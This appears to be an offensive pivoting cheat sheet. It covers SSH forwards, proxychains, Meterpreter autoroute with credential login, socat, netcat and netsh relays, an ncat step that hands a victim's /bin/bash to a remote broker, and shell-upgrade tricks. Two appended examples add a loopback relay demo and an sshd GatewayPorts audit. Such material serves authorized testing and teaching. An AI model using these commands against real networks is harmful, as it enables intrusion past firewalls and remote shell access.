Pivoting Cheat Sheet v1.1
[Link]/offensive-operations

Purpose
Navigating a client/victim environment often requires pivoting from target to target, and there are many ways to do so. This cheat sheet runs through various options for different environments and situations.

How to Use this Sheet
Find a method that may fit your situation. In each, we model an attacker pivoting through pivot to reach SSH on victim. Substitute hosts and ports to fit your need.
Pay attention to prompts as they will identify the host where the command should be run AND what type of prompt, i.e. Windows (c:\>), PowerShell (PS), or Linux ($ or #). The diagram in the center should help.
Replace terms like victimAdmin and victimPass with appropriate credentials for the given system.
On the back, there are some extra goodies - like how to upgrade an ugly Netcat shell to something that feels more like a real Bash session.
Have fun, good luck, and pivot mercilessly!

Situation
You need to access SSH on port 22 of victim, but you can't go directly due to those meddling firewalls. For simplicity, this sheet will generally be using ports 1337, 4000, and 22 on the Attacker, Pivot, and Victim machines.

[Diagram: attacker (:1337) -> pivot (:4000) -> victim (:22). The host addresses from the diagram are written as attackerIP, pivotIP and victimIP below; substitute your own.]

SSH Pivots Require an sshd Setting
Set GatewayPorts yes in /etc/ssh/sshd_config, then:
  pivot # systemctl restart sshd

SSH Local Port Forward
  attacker $ ssh -fNL 1337:victimIP:22 pivoter@pivotIP
  attacker $ ssh victimadmin@localhost -p 1337

SSH Remote Port Forward
  pivot $ ssh -fNR 1337:victimIP:22 attacker@attackerIP
  attacker $ ssh victimadmin@localhost -p 1337

Proxychains
  attacker $ ssh pivotadmin@pivotIP -D 9050 -fN
  attacker $ proxychains ssh victimadmin@victimIP
And check /etc/proxychains.conf

Some SSH Command Line Options
  -f      put ssh in the background after connecting
  -N      don't execute a command; just forward some ports
  -p num  use "num" as the port for ssh

Meterpreter Port Forward
  pivot Meterpreter > portfwd add -l 4000 -p 22 -r victimIP
  attacker $ ssh victimadmin@pivotIP -p 4000

Metasploit/Meterpreter Autoroute
  pivot Meterpreter > run post/multi/manage/autoroute SUBNET=pivotSubnet CMD=add
  pivot Meterpreter > background
  pivot msf > use scanner/ssh/ssh_login
  pivot msf > set RHOSTS victimIP
  pivot msf > set USERNAME victimAdmin
  pivot msf > set PASSWORD victimPass
  pivot msf > run

Socat Port Forward
  pivot $ socat TCP-LISTEN:4000,fork TCP:victimIP:22
  attacker $ ssh victimadmin@pivotIP -p 4000

Netcat Port Forward
  pivot $ cd /tmp && mknod backpipe p
  pivot $ nc -lvp 4000 0<backpipe | nc -v victimIP 22 1>backpipe
  attacker $ ssh victimadmin@pivotIP -p 4000

Ncat Connection Brokering
Assumes code execution on victim.
  pivot $ ncat -vlp 4000 --broker
  victim $ ncat pivotIP 4000 -e /bin/bash
  attacker $ ncat pivotIP 4000

netsh Port Proxy
  pivot c:\> netsh interface portproxy add v4tov4 listenport=4000 listenaddress=pivotIP connectport=22 connectaddress=victimIP
  attacker $ ssh victimadmin@pivotIP -p 4000

Upgrade Ugly Shells (pick one!)
  $ python -c 'import pty; pty.spawn("/bin/bash")'
  $ ruby -e 'exec "/bin/sh"'
  $ /bin/sh -i or /bin/bash -i
  $ perl -e 'exec "/bin/sh";'

Further Upgrade Ugly Shells
Things seem off? Sometimes this can return functionality like arrow keys in a shell.
  victim $ <Ctrl>z
  attacker $ stty raw -echo
  attacker $ fg
  victim $ reset
  victim $ export SHELL=bash
  victim $ export TERM=xterm-256color
  victim $ stty rows 40 columns 80

Don't Forget the Easy Stuff!
SSH trail through Linux:
  attacker $ ssh pivotAdmin@pivotIP
  pivot $ ssh victimAdmin@victimIP
PowerShell sessions through Windows:
  attacker PS C:\> Enter-PsSession -ComputerName pivotIP
Or RDP session over Windows:
  attacker c:\> mstsc /v:pivotIP
Now, with command execution on pivot:
  pivot C:\> ssh victimadmin@victimIP
No SSH available? How about PuTTY?
Note that even if all the hosts in the chain run Windows, you can't typically PsSession twice because of how credentials are used. Run a search for pssession double hop for more info.

Maintain State with Screen
  victim $ screen -S hackinz
- Session fails
- Regain session, THEN:
  victim $ screen -r hackinz
Want more functionality than screen? Check out tmux.
Is your connection not stable enough for ssh? mosh is more forgiving of spotty connections.

Manage Many SSH Connections
Check out ProxyJump in ~/.ssh/config to manage a wide array of ssh connections.
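The Socat, Netcat and netsh forwards above are all the same mechanism: a listener on pivot that relays every accepted connection to victim:22, so that ssh to pivot:4000 behaves like ssh to victim:22. The block below is an added example, not from this cheat sheet: a minimal Python relay that does what `socat TCP-LISTEN:4000,fork TCP:victimIP:22` does, run entirely on 127.0.0.1 against a constructed stand-in for the victim's sshd (it only sends an SSH-style banner and echoes one line back). The stub, its banner text and all function names are assumptions of the example.

```python
import socket
import threading


def pump(src, dst):
    """Copy bytes src -> dst until EOF, then close dst's write side so the
    far end sees EOF too (one direction of the socat/netcat relay)."""
    try:
        while True:
            chunk = src.recv(4096)
            if not chunk:
                break
            dst.sendall(chunk)
    except OSError:
        pass
    finally:
        try:
            dst.shutdown(socket.SHUT_WR)
        except OSError:
            pass


def relay_connection(client, target):
    """For one accepted client, connect onward to target and relay both ways."""
    try:
        upstream = socket.create_connection(target, timeout=5)
    except OSError:
        client.close()
        return
    upstream.settimeout(None)
    back = threading.Thread(target=pump, args=(upstream, client), daemon=True)
    back.start()
    pump(client, upstream)
    back.join()
    client.close()
    upstream.close()


def start_forwarder(listen_host, listen_port, target):
    """Equivalent of `socat TCP-LISTEN:<listen_port>,fork TCP:<target>`.
    Returns (bound_port, stop_function); port 0 picks a free port."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((listen_host, listen_port))
    srv.listen(16)
    srv.settimeout(0.2)  # lets the accept loop notice the stop flag
    stop = threading.Event()

    def accept_loop():
        while not stop.is_set():
            try:
                client, _ = srv.accept()
            except socket.timeout:
                continue
            except OSError:
                break
            client.settimeout(None)
            threading.Thread(target=relay_connection, args=(client, target),
                             daemon=True).start()
        srv.close()

    threading.Thread(target=accept_loop, daemon=True).start()
    return srv.getsockname()[1], stop.set


def start_victim_stub(banner=b"SSH-2.0-constructed-stub\r\n"):
    """Constructed stand-in for sshd on victim:22 (assumption of this example):
    sends a banner, echoes one message, then hangs up. Returns its port."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)

    def serve_once():
        conn, _ = srv.accept()
        with conn:
            conn.sendall(banner)
            conn.sendall(b"echo:" + conn.recv(4096))
        srv.close()

    threading.Thread(target=serve_once, daemon=True).start()
    return srv.getsockname()[1]


def demo():
    """attacker -> pivot (forwarder) -> victim (stub), all on loopback.
    Returns what the attacker side received through the relay."""
    victim_port = start_victim_stub()
    pivot_port, stop_forwarder = start_forwarder("127.0.0.1", 0,
                                                 ("127.0.0.1", victim_port))
    with socket.create_connection(("127.0.0.1", pivot_port), timeout=5) as attacker:
        banner = attacker.recv(4096)
        attacker.sendall(b"hello pivot\n")
        reply = attacker.recv(4096)
    stop_forwarder()
    return banner, reply


if __name__ == "__main__":
    print(demo())
```

Whichever tool is used, the observable on pivot is the same: a new listening port plus an outbound connection to a host it normally would not talk to, which is what a listening-port inventory on the pivot (`ss -ltnp` on Linux, `netsh interface portproxy show all` for the netsh variant) surfaces.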
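The sshd setting above matters because GatewayPorts decides whether a remote forward (`ssh -R`) may bind to the pivot's non-loopback addresses. Two details of how sshd reads its config trip people up when checking this: sshd keeps the first value it obtains for a keyword, so a `GatewayPorts no` added below an existing `GatewayPorts yes` changes nothing, and a Match block can set it for particular users only. The block below is an added example, not from this cheat sheet: a small audit function over sshd_config text that applies both rules and reports whether any remote forward could be bound externally. The sample config it parses is constructed for the example, and the function names are its own.

```python
# Values of GatewayPorts that let a remote forward bind on non-loopback addresses.
EXPOSING_VALUES = {"yes", "clientspecified"}


def parse_sshd_config(text):
    """Parse sshd_config text into (global_settings, match_blocks).

    global_settings: {keyword_lower: value}, keeping the FIRST value seen,
    which is the rule sshd applies.
    match_blocks: list of (match_criteria, {keyword_lower: value}) for each
    Match block, in file order.
    """
    global_settings = {}
    match_blocks = []
    current = global_settings
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(None, 1)
        if len(parts) == 1 and "=" in parts[0]:  # sshd also accepts Key=value
            parts = parts[0].split("=", 1)
        if len(parts) != 2:
            continue
        keyword, value = parts[0].lower(), parts[1].strip()
        if keyword == "match":
            current = {}
            match_blocks.append((value, current))
            continue
        current.setdefault(keyword, value)  # first obtained value wins
    return global_settings, match_blocks


def audit_gateway_ports(text):
    """Return {'global': effective global value, 'overrides': [(criteria, value)],
    'exposed': True if any scope allows externally bound remote forwards}."""
    global_settings, match_blocks = parse_sshd_config(text)
    value = global_settings.get("gatewayports", "no").lower()  # sshd default is no
    overrides = [(crit, blk["gatewayports"].lower())
                 for crit, blk in match_blocks if "gatewayports" in blk]
    exposed = value in EXPOSING_VALUES or any(v in EXPOSING_VALUES for _, v in overrides)
    return {"global": value, "overrides": overrides, "exposed": exposed}


# Constructed sample sshd_config for the example (not a real host's file).
SAMPLE_CONFIG = """\
Port 22
GatewayPorts yes
PermitRootLogin no
# added later in a hurry; sshd ignores it because the first value wins
GatewayPorts no
Match User pivoter
    GatewayPorts clientspecified
"""

# The corrected form: first global value is no, and no Match block widens it.
HARDENED_CONFIG = """\
Port 22
GatewayPorts no
PermitRootLogin no
"""

if __name__ == "__main__":
    print(audit_gateway_ports(SAMPLE_CONFIG))
    print(audit_gateway_ports(HARDENED_CONFIG))
```

Because of the first-value rule, the fix for an exposed pivot is to edit or remove the earliest `GatewayPorts` line (and any Match override), not to append a new one, and then restart sshd as the sheet shows.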